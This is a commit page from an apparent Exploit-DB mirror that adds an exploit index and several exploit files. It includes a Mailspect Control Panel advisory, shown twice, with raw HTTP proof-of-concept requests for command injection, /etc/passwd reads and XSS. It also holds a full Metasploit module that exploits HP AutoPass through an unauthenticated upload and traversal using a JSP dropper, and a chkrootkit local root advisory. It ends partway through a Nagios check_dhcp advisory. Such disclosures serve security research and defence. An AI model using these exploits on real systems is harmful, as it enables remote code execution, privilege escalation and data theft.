bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 06_29_2014

Browse source
This commit is contained in:
Offensive Security 2014-06-29 04:38:54 +00:00
parent adfb91d89a
commit bf1d5f6e68
22 changed files with 1873 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

21
files.csv
View file

@ -30506,6 +30506,7 @@ id,file,description,date,author,platform,type,port
33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password CSRF",2014-06-25,nopesled,hardware,webapps,0
33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 Unauthenticated Remote Command Execution Exploit",2014-06-25,LiquidWorm,php,webapps,0
33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 Source Code Information Disclosure Vulnerability",2010-04-22,"Veerendra G.G",multiple,remote,0
33869,platforms/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure Vulnerability",2010-04-22,hkm,hardware,remote,0
33870,platforms/php/webapps/33870.txt,"FlashCard 2.6.5 'id' Parameter Cross Site Scripting Vulnerability",2010-04-22,Valentin,php,webapps,0
33871,platforms/multiple/remote/33871.txt,"Tiny Java Web Server 1.71 Multiple Input Validation Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0
33873,platforms/multiple/remote/33873.txt,"HP System Management Homepage 'RedirectUrl' Parameter URI Redirection Vulnerability",2010-04-25,"Aung Khant",multiple,remote,0
@ -30522,3 +30523,23 @@ id,file,description,date,author,platform,type,port
33884,platforms/php/webapps/33884.txt,"Zikula Application Framework 1.2.2 ZLanguage.php lang Parameter XSS",2010-04-13,"High-Tech Bridge SA",php,webapps,0
33885,platforms/php/webapps/33885.txt,"Zikula Application Framework 1.2.2 index.php func Parameter XSS",2010-04-13,"High-Tech Bridge SA",php,webapps,0
33886,platforms/linux/dos/33886.txt,"Linux Kernel 'find_keyring_by_name()' Local Memory Corruption Vulnerability",2010-04-27,"Toshiyuki Okajima",linux,dos,0
33887,platforms/cgi/webapps/33887.txt,"Mailspect Control Panel 4.0.5 - Multiple Vulnerabilities",2014-06-27,"Onur Alanbel (BGA)",cgi,webapps,0
33888,platforms/php/webapps/33888.txt,"ProArcadeScript 'search.php' Cross Site Scripting Vulnerability",2010-04-27,Sid3^effects,php,webapps,0
33889,platforms/php/webapps/33889.txt,"SmartBlog 1.3 SQL Injection and Cross Site Scripting Vulnerabilities",2010-04-27,indoushka,php,webapps,0
33890,platforms/windows/remote/33890.txt,"OneHTTPD 0.6 Directory Traversal Vulnerability",2010-04-27,"John Leitch",windows,remote,0
33891,platforms/java/remote/33891.rb,"HP AutoPass License Server File Upload",2014-06-27,metasploit,java,remote,5814
33892,platforms/windows/local/33892.rb,"MS14-009 .NET Deployment Service IE Sandbox Escape",2014-06-27,metasploit,windows,local,0
33893,platforms/windows/local/33893.rb,"MS13-097 Registry Symlink IE Sandbox Escape",2014-06-27,metasploit,windows,local,0
33894,platforms/multiple/webapps/33894.txt,"Python CGIHTTPServer Encoded Path Traversal",2014-06-27,"RedTeam Pentesting",multiple,webapps,0
33895,platforms/cgi/webapps/33895.txt,"Mailspect Control Panel 4.0.5 - Multiple Vulnerabilities",2014-06-27,"BGA Security",cgi,webapps,20001
33896,platforms/php/webapps/33896.txt,"Wordpress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities",2014-06-27,dxw,php,webapps,80
33897,platforms/multiple/webapps/33897.txt,"Endeca Latitude 2.2.2 - CSRF Vulnerability",2014-06-27,"RedTeam Pentesting",multiple,webapps,0
33899,platforms/linux/local/33899.txt,"chkrootkit 0.49 - Local Root Vulnerability",2014-06-28,"Thomas Stangner",linux,local,0
33900,platforms/windows/remote/33900.pl,"Serenity Audio Player 3.2.3 '.m3u' File Buffer Overflow Vulnerability",2010-04-26,Madjix,windows,remote,0
33901,platforms/windows/remote/33901.rb,"Serenity Audio Player 3.2.3 '.m3u' File Buffer Overflow Vulnerability (meta)",2010-04-26,blake,windows,remote,0
33904,platforms/linux/local/33904.txt,"check_dhcp 2.0.2 (Nagios Plugins) - Arbitrary Option File Read Race Condition Exploit",2014-06-28,"Dawid Golunski",linux,local,0
33905,platforms/multiple/remote/33905.txt,"Apache ActiveMQ 5.3 'admin/queueBrowse' Cross Site Scripting Vulnerability",2010-04-28,"arun kethipelly",multiple,remote,0
33906,platforms/php/webapps/33906.txt,"velBox 1.2 Insecure Cookie Authentication Bypass Vulnerability",2010-04-28,indoushka,php,webapps,0
33907,platforms/multiple/remote/33907.txt,"ZKSoftware 'ZK5000' Remote Information Disclosure Vulnerability",2010-03-20,fb1h2s,multiple,remote,0
33908,platforms/php/webapps/33908.txt,"Your Articles Directory Login Option SQL Injection Vulnerability",2010-04-29,Sid3^effects,php,webapps,0
33909,platforms/php/webapps/33909.txt,"Tele Data's Contact Management Server 0.9 'username' Parameter SQL Injection Vulnerability",2010-04-28,"John Leitch",php,webapps,0

Can't render this file because it is too large.

147
platforms/cgi/webapps/33887.txt Executable file
View file

@ -0,0 +1,147 @@
Document Title:
============
Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities
Release Date:
===========
June 21, 2014
Product & Service Introduction:
========================
Mailspect is the email security and archiving brand of RAE Internet Inc., Tarrytown, New York. The Mailspect product suite was launched
in 2005 as a Control Panel for Open Source antispam and antivirus scanning engines such as Clamd and Spamassassin.
Mailspect Defense offered easy-to-use configuration and update tools and an integrated Quaratine Solution and Mail Filter. Subsequently,
the Control Panel has expanded to include commercial scanning engines such as Cloudmark, ESET, F-FROT, Mailshell, and Sophos and built-in
content filers and reputation engines.
Abstract Advisory Information:
=======================
BGA Team discovered a remote code execution, two arbitrary file read and one cross site scripting vulnerability in Mailspect Control Panel
4.0.5 web application.
Vulnerability Disclosure Timeline:
=========================
May 4, 2014 : Contact with Vendor
May 16, 2014 : Vendor Response
June 21, 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Multilayered Email Security & Archive for Gateways, MTA's & Servers
Product: Mailspect Control Panel 4.0.5
Other versions may be affected.
Exploitation Technique:
==================
RCE: Remote, Authenticated
AFR: Remote, Authenticated
XSS: Remote, Unauthenticated
Severity Level:
===========
High
Technical Details & Description:
========================
1. Sending a POST request to "/system_module.cgi" with config_version_cmd parameter's value set to a linux command group like "whoami >
/tmp/who; /usr/local/MPP/mppd -v" causes the former command's execution by sending a GET request (or simply visiting) to
"status_info.cgi?group=default" page.
Other parameters with the suffix "_cmd" are probably vulnerable.
2. Sending a GET request to "/monitor_logs_ctl.cgi" with log_dir parameter's value set to "/" and log_file's value set to an arbitrary
file name like "/etc/passwd" will cause the file's content's disclosure.
3. Sending a POST request to "/monitor_manage_logs.cgi" with log_file parameter's value set to an arbitrary file name like "/etc/passwd"
will cause the file's content's disclosure.
4. Sending a POST request to "/monitor_manage_logs.cgi" with login parameter's value set to "></script>js to be executed<script/> leads
the Javascript code's execution.
Proof of Concept (PoC):
==================
Proof of Concept RCE Request:
POST /system_module.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/system_module.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1282
post=1&config_mppd_conf=%2Fusr%2Flocal%2FMPP%2Fmppd.conf.xml&config_language=&config_log_dir=%2Fvar%2Flog%2FMPP%2F&config_version_cmd=whoami+%3E+%2Ftmp%2Fwho%3B+%2Fusr%2Flocal%2FMPP%2Fmppd+-v&config_licence_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-l+%2Fusr%2Flocal%2FMPP%2Fkey.txt&config_start_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd&config_stop_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-s&config_restart_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-r&config_sophos_daily=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fsophosdaily.sh&config_sophos_monthly=%2Fusr%2Flocal%2FMPP%2Fscripts%2Fsophosmonthly.pl&config_fprot_update=%2Fusr%2Flocal%2Ff-prot%2Ftools%2Fcheck-updates.pl&config_cloudmark_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fcloudmarkupdate.sh&config_cgate_submitted=%2Fvar%2FCommuniGate%2FSubmitted&config_clamav_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fclamavupdate.sh&config_cloudmark_dir=%2Fusr%2Flocal%2FMPP%2Fcloudmark&config_mailshell_dir=%2Fusr%2Flocal%2FMPP%2Fmailshell&config_fprot_dir=&config_pid_file=%2Fvar%2Frun%2Fmppd.pid&config_mailshell_update=%2Fusr%2Flocal%2FMPP%2Fmailshellupdate&config_mpp_parser_log_dir=%2Fvar%2Flog%2FMPP%2F%2Fplog&config_mpp_parser_time_interval=20&page_refresh=60
2. Proof of Concept AFR Request 1:
GET /monitor_logs_ctl.cgi?log_file=/etc/passwd&log_dir=/&mode=tail&lines=50&filter=&dummy=0.4426060212816081 HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_realtime_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
3. Proof of Concept AFR Request 2:
POST /monitor_manage_logs.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_manage_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
group=default&post=1&log_file=/etc/passwd&download=Download&save_to_dir=&tar_gzip=on
4. Proof of Concept XSS Request:
GET /login.cgi?login=abc%22%3E%3Cscript%3Ealert(/bga/)%3C/script%3E HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Solution Fix & Patch:
================
XSS will be patched at version 4.0.7
There will be no patch for RCE and AFR vulnerabilities as stated at the vendors reply.
Security Risk:
==========
The risk of the vulnerabilities above estimated as high.
Credits & Authors:
==============
Bilgi Guvenligi AKADEMISI - Onur ALANBEL, Ender AKBA?
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Domain: www.bga.com.tr/advisories.html
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA Security

147
platforms/cgi/webapps/33895.txt Executable file
View file

@ -0,0 +1,147 @@
Document Title:
============
Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities
Release Date:
===========
June 21, 2014
Product & Service Introduction:
========================
Mailspect is the email security and archiving brand of RAE Internet Inc., Tarrytown, New York. The Mailspect product suite was launched
in 2005 as a Control Panel for Open Source antispam and antivirus scanning engines such as Clamd and Spamassassin.
Mailspect Defense offered easy-to-use configuration and update tools and an integrated Quaratine Solution and Mail Filter. Subsequently,
the Control Panel has expanded to include commercial scanning engines such as Cloudmark, ESET, F-FROT, Mailshell, and Sophos and built-in
content filers and reputation engines.
Abstract Advisory Information:
=======================
BGA Team discovered a remote code execution, two arbitrary file read and one cross site scripting vulnerability in Mailspect Control Panel
4.0.5 web application.
Vulnerability Disclosure Timeline:
=========================
May 4, 2014 : Contact with Vendor
May 16, 2014 : Vendor Response
June 21, 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Multilayered Email Security & Archive for Gateways, MTA's & Servers
Product: Mailspect Control Panel 4.0.5
Other versions may be affected.
Exploitation Technique:
==================
RCE: Remote, Authenticated
AFR: Remote, Authenticated
XSS: Remote, Unauthenticated
Severity Level:
===========
High
Technical Details & Description:
========================
1. Sending a POST request to "/system_module.cgi" with config_version_cmd parameter's value set to a linux command group like "whoami >
/tmp/who; /usr/local/MPP/mppd -v" causes the former command's execution by sending a GET request (or simply visiting) to
"status_info.cgi?group=default" page.
Other parameters with the suffix "_cmd" are probably vulnerable.
2. Sending a GET request to "/monitor_logs_ctl.cgi" with log_dir parameter's value set to "/" and log_file's value set to an arbitrary
file name like "/etc/passwd" will cause the file's content's disclosure.
3. Sending a POST request to "/monitor_manage_logs.cgi" with log_file parameter's value set to an arbitrary file name like "/etc/passwd"
will cause the file's content's disclosure.
4. Sending a POST request to "/monitor_manage_logs.cgi" with login parameter's value set to "></script>js to be executed<script/> leads
the Javascript code's execution.
Proof of Concept (PoC):
==================
Proof of Concept RCE Request:
POST /system_module.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/system_module.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1282
post=1&config_mppd_conf=%2Fusr%2Flocal%2FMPP%2Fmppd.conf.xml&config_language=&config_log_dir=%2Fvar%2Flog%2FMPP%2F&config_version_cmd=whoami+%3E+%2Ftmp%2Fwho%3B+%2Fusr%2Flocal%2FMPP%2Fmppd+-v&config_licence_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-l+%2Fusr%2Flocal%2FMPP%2Fkey.txt&config_start_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd&config_stop_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-s&config_restart_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-r&config_sophos_daily=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fsophosdaily.sh&config_sophos_monthly=%2Fusr%2Flocal%2FMPP%2Fscripts%2Fsophosmonthly.pl&config_fprot_update=%2Fusr%2Flocal%2Ff-prot%2Ftools%2Fcheck-updates.pl&config_cloudmark_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fcloudmarkupdate.sh&config_cgate_submitted=%2Fvar%2FCommuniGate%2FSubmitted&config_clamav_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fclamavupdate.sh&config_cloudmark_dir=%2Fusr%2Flocal%2FMPP%2Fcloudmark&config_mailshell_dir=%2Fusr%2Flocal%2FMPP%2Fmailshell&config_fprot_dir=&config_pid_file=%2Fvar%2Frun%2Fmppd.pid&config_mailshell_update=%2Fusr%2Flocal%2FMPP%2Fmailshellupdate&config_mpp_parser_log_dir=%2Fvar%2Flog%2FMPP%2F%2Fplog&config_mpp_parser_time_interval=20&page_refresh=60
2. Proof of Concept AFR Request 1:
GET /monitor_logs_ctl.cgi?log_file=/etc/passwd&log_dir=/&mode=tail&lines=50&filter=&dummy=0.4426060212816081 HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_realtime_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
3. Proof of Concept AFR Request 2:
POST /monitor_manage_logs.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_manage_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
group=default&post=1&log_file=/etc/passwd&download=Download&save_to_dir=&tar_gzip=on
4. Proof of Concept XSS Request:
GET /login.cgi?login=abc%22%3E%3Cscript%3Ealert(/bga/)%3C/script%3E HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Solution Fix & Patch:
================
XSS will be patched at version 4.0.7
There will be no patch for RCE and AFR vulnerabilities as stated at the vendor's reply.
Security Risk:
==========
The risk of the vulnerabilities above estimated as high.
Credits & Authors:
==============
Bilgi Guvenligi AKADEMISI - Onur ALANBEL, Ender AKBAÞ
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Domain: www.bga.com.tr/advisories.html
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA Security

11
platforms/hardware/remote/33869.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/39646/info
The Huawei EchoLife HG520 is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
The following Huawei EchoLife HG520 firmware and software versions are vulnerable:
Firmware 3.10.18.7-1.0.7.0, 3.10.18.5-1.0.7.0, 3.10.18.4
Software Versions: V100R001B120Telmex, V100R001B121Telmex
http://www.exploit-db.com/sploits/33869.tar.gz

196
platforms/java/remote/33891.rb Executable file
View file

@ -0,0 +1,196 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'HP AutoPass License Server File Upload',
'Description' => %q{
This module exploits a code execution flaw in HP AutoPass License Server. It abuses two
weaknesses in order to get its objective. First, the AutoPass application doesn't enforce
authentication in the CommunicationServlet component. On the other hand, it's possible to
abuse a directory traversal when uploading files thorough the same component, allowing to
upload an arbitrary payload embedded in a JSP. The module has been tested successfully on
HP AutoPass License Server 8.01 as installed with HP Service Virtualization 3.50.
},
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-6221'],
['ZDI', '14-195'],
['BID', '67989'],
['URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04333125']
],
'Privileged' => true,
'Platform' => %w{ java },
'Arch' => ARCH_JAVA,
'Targets' =>
[
['HP AutoPass License Server 8.01 / HP Service Virtualization 3.50', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 10 2014'))
register_options(
[
Opt::RPORT(5814),
OptString.new('TARGETURI', [true, 'Path to HP AutoPass License Server Application', '/autopass']),
OptInt.new('INSTALL_DEPTH', [true, 'Traversal Depth to reach the HP AutoPass License Server folder', 4]),
OptInt.new('WEBAPPS_DEPTH', [true, 'Traversal Depth to reach the Tomcat webapps folder', 1])
], self.class)
end
def check
check_code = Exploit::CheckCode::Safe
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path.to_s, "cs","pdfupload"),
'method' => 'POST'
})
unless res
check_code = Exploit::CheckCode::Unknown
end
if res && res.code == 500 &&
res.body.to_s.include?("HP AutoPass License Server") &&
res.body.to_s.include?("java.lang.NullPointerException") &&
res.body.to_s.include?("com.hp.autopass")
check_code = Exploit::CheckCode::Detected
end
check_code
end
def exploit
app_base = rand_text_alphanumeric(4+rand(32-4))
war = payload.encoded_war({ :app_name => app_base }).to_s
war_filename = "#{app_base}.war"
# By default, the working directory when executing the JSP is:
# C:\Program Files\HP\HP AutoPass License Server\HP AutoPass License Server\HP AutoPass License Server\bin
# The war should be dropped to the next location to autodeploy:
# C:\Program Files\HP\HP AutoPass License Server\HP AutoPass License Server\HP AutoPass License Server\webapps
war_traversal = webapps_traversal
war_traversal << "webapps/#{war_filename}"
dropper = jsp_drop_bin(war, war_traversal)
dropper_filename = rand_text_alpha(8) + ".jsp"
print_status("#{peer} - Uploading the JSP dropper #{dropper_filename}...")
# The JSP, by default, is uploaded to:
# C:\Program Files\HP\HP AutoPass License Server\AutoPass\LicenseServer\conf\pdfiles\
# In order to execute it, through the AutoPass application we would like to drop it here:
# C:\Program Files\HP\HP AutoPass License Server\HP AutoPass License Server\HP AutoPass License Server\webapps\autopass\scripts
dropper_traversal = install_traversal
dropper_traversal << "/HP AutoPass License Server/HP AutoPass License Server/webapps/autopass/scripts/#{dropper_filename}"
res = upload_file(dropper_traversal, dropper)
register_files_for_cleanup("#{webapps_traversal}webapps/autopass/scripts/#{dropper_filename}")
register_files_for_cleanup("#{webapps_traversal}webapps/#{war_filename}")
unless res && res.code == 500 &&
res.body.to_s.include?("HP AutoPass License Server") &&
res.body.to_s.include?("java.lang.NullPointerException") &&
res.body.to_s.include?("com.hp.autopass")
print_error("#{peer} - Unexpected response... upload maybe failed, trying anyway...")
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "scripts", dropper_filename),
'method' => 'GET'
})
unless res and res.code == 200
print_error("#{peer} - Unexpected response after executing the dropper...")
end
10.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8) + ".jsp"),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
def webapps_traversal
"../" * datastore['WEBAPPS_DEPTH']
end
def install_traversal
"/.." * datastore['INSTALL_DEPTH']
end
# Using a JSP dropper because the vulnerability doesn't allow to upload
# 'binary' files, so a WAR can't be uploaded directly.
def jsp_drop_bin(bin_data, output_file)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
jspraw << %Q|int numbytes = data.length();\n|
jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
jspraw << %Q|{\n|
jspraw << %Q| char char1 = (char) data.charAt(counter);\n|
jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|
jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|
jspraw << %Q| comb <<= 4;\n|
jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|
jspraw << %Q| bytes[counter/2] = (byte)comb;\n|
jspraw << %Q|}\n|
jspraw << %Q|outputstream.write(bytes);\n|
jspraw << %Q|outputstream.close();\n|
jspraw << %Q|%>\n|
jspraw
end
def upload_file(file_name, contents)
post_data = Rex::MIME::Message.new
post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadedFile\"; filename=\"#{file_name}\"")
data = post_data.to_s
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path.to_s, "cs","pdfupload"),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
res
end
end

68
platforms/linux/local/33899.txt Executable file
View file

@ -0,0 +1,68 @@
We just found a serious vulnerability in the chkrootkit package, which
may allow local attackers to gain root access to a box in certain
configurations (/tmp not mounted noexec).
The vulnerability is located in the function slapper() in the
shellscript chkrootkit:
#
# SLAPPER.{A,B,C,D} and the multi-platform variant
#
slapper (){
SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c"
SLAPPER_FILES="$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \
${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"a
SLAPPER_PORT="0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 "
OPT=-an
STATUS=0
file_port=
if ${netstat} "${OPT}"|${egrep} "^tcp"|${egrep} "${SLAPPER_PORT}">
/dev/null 2>&1
then
STATUS=1
[ "$SYSTEM" = "Linux" ] && file_port=`netstat -p ${OPT} | \
$egrep ^tcp|$egrep "${SLAPPER_PORT}" | ${awk} '{ print $7 }' |
tr -d :`
fi
for i in ${SLAPPER_FILES}; do
if [ -f ${i} ]; then
file_port=$file_port $i
STATUS=1
fi
done
if [ ${STATUS} -eq 1 ] ;then
echo "Warning: Possible Slapper Worm installed ($file_port)"
else
if [ "${QUIET}" != "t" ]; then echo "not infected"; fi
return ${NOT_INFECTED}
fi
}
The line 'file_port=$file_port $i' will execute all files specified in
$SLAPPER_FILES as the user chkrootkit is running (usually root), if
$file_port is empty, because of missing quotation marks around the
variable assignment.
Steps to reproduce:
- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)
Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.
If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.
Suggested fix: Put quotation marks around the assignment.
file_port="$file_port $i"
I will also try to contact upstream, although the latest version of
chkrootkit dates back to 2009 - will have to see, if I reach a dev there.

240
platforms/linux/local/33904.txt Executable file
View file

@ -0,0 +1,240 @@
=============================================
- Release date: 28.06.2014
- Discovered by: Dawid Golunski
- Severity: Moderate
=============================================
I. VULNERABILITY
-------------------------
check_dhcp - Nagios Plugins = 2.0.2 Race Condition
II. BACKGROUND
-------------------------
"Nagios is an open source computer system monitoring, network monitoring and
infrastructure monitoring software application. Nagios offers monitoring and
alerting services for servers, switches, applications, and services.
It alerts the users when things go wrong and alerts them a second time when
the problem has been resolved.
Nagios Plugins (Official)
The Nagios Plugins Development Team maintains a bundle of more than fifty
standard plugins for Nagios and other monitoring applications that use the
straightforward plugin interface originally invented by the Nagios folks.
Each plugin is a stand-alone command line tool that provides a specific type
of check. Typically, your monitoring software runs these plugins to determine
the current status of hosts and services on your network.
Some of the provided plugins let you check local system metrics (such as load
averages, processes, or disk space usage), others use various network protocols
(such as ICMP, SNMP, or HTTP) to perform remote checks.
This allows for checking a large number of common host and service types.
* check_dhcp plugin
This plugin tests the availability of DHCP servers on a network."
III. INTRODUCTION
-------------------------
check_dhcp plugin (part of the official Nagios Plugins package) contained
a vulnerability that allowed a malicious attacker to read parts of INI
config files belonging to root on a local system. It allowed an attacker
to obtain sensitive information like passwords that should only be accessible
by root user.
This vulnerability was discussed in my previous advisory available at:
http://legalhackers.com/advisories/nagios-check_dhcp.txt
